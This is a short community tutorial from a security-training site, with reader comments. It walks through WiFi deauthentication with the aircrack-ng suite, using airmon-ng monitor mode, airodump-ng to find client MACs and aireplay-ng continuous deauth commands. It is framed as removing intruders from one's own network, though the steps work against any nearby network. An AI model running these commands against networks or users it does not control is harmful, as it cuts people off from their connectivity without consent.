Remove Users from Your Network Using Airmon-ng

August 30, 2016 | Views: 6949

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Today, I’ll demonstrate to you how you can remove someone from your network. This article is for educational purposes only.

I will separate this tutorial into steps, so it’s simple to understand.

Let’s start…


STEP 1: Put our WiFi card in monitoring mode:

  1. Open terminal
  2. Type: airmon-ng start wlan0
  3. That’s it!

Now, our card is in monitoring mode.


STEP 2: Finding our BSSID and finding our victim’s MAC address:

  1. Open a new terminal
  2. Type: airodump-ng wlan0
  3. Airodump-ng wlan0 will display all routers that are near you and you need to find your router BSSID.
  4. When you find your BSSID, in a new terminal, you need to type: airodump-ng –bssid (your bssid)
  5. Airodump-ng –bssid (your bssid) will display your victim’s MAC addresses so you can remove them.

After you found your victim’s MAC address, follow the next step.


STEP 3: Remove the user from your network:

There are 2 ways to remove a user from your network with aireplay-ng: by their IP address or by their MAC address.

  • Remove a user using their MAC address:
    aireplay-ng –deauth 0 -a ( your router bssid) -c (their mac address)
  • Remove a user with their IP address:
    aireplay-ng –deauth 0 -a (your router  bssid) -k (their ip address)


So that’s it. I hope you’ll find this article helpful and that it won’t be used to do any harm.

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. How do you return the person back on the network?

  2. … and if the intruder is spoofing identifiers, say using the MAC addy of one of your devices that was seen earlier when the intruder was sniffing the air, won’t you end up DoSing yourself when you leave aireplay-ng running to KEEP that intruder out?
    This solution works, is virtually immediate, and can go south just as quickly as the intruder changes profile. It does illustrate some key points about WiFi communications and why they are so difficult to secure. I prefer ACLs myself (Access control list) but it too fails for the same reason. Much too easy to spoof.

    • I love it when you reply, I always feel experience flowing from your responses. You bring up accurate info all the time.

      It’s nice to learn what else Aircrack can do for you. If the you wish to remove is an average joe, the 1st deauth is all you’ll need. But if it’s an intruder, You’re right, they most likely know how to change their mac too (takes a few seconds). Which means a lot of tedious work for the network admin. May the most persistent win ^-^

  3. hello what mean by BSSID, thank

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?